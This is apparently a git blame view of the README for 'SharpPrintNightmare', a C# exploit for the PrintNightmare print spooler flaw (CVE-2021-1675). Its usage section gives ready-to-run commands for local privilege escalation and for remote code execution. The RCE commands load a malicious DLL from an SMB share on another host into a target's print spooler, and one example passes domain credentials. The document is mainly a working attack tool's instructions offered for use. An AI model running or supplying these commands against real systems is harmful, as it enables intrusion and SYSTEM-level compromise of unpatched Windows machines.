2021-07-02 00:17:44 +00:00
|
|
|
# C# Implementation of CVE-2021-1675
|
2021-07-01 11:45:37 +00:00
|
|
|
|
|
|
|
### Usage
|
|
|
|
|
|
|
|
```
|
2021-07-01 21:30:25 +00:00
|
|
|
#LPE
|
2021-07-01 11:45:37 +00:00
|
|
|
C:\SharpPrintNightmare.exe C:\addCube.dll
|
2021-07-01 21:30:25 +00:00
|
|
|
|
|
|
|
#RCE using existing context
|
|
|
|
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20'
|
|
|
|
|
|
|
|
#RCE using runas /netonly
|
|
|
|
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' hackit.local domain_user Pass123
|
2021-07-01 11:45:37 +00:00
|
|
|
```
|
|
|
|
|
2021-07-01 21:30:25 +00:00
|
|
|
![](../Images/poc4.png)
|
|
|
|
|
2021-07-01 11:45:37 +00:00
|
|
|
![](../Images/poc3.png)
|
2021-07-02 00:13:30 +00:00
|
|
|
|
2021-07-02 00:17:44 +00:00
|
|
|
### Acknowledgements
|
|
|
|
For contributing new ideas or exploit improvements, thanks to
|
2021-07-02 00:13:30 +00:00
|
|
|
* [kiqrx](https://www.hackthebox.eu/home/users/profile/72916)
|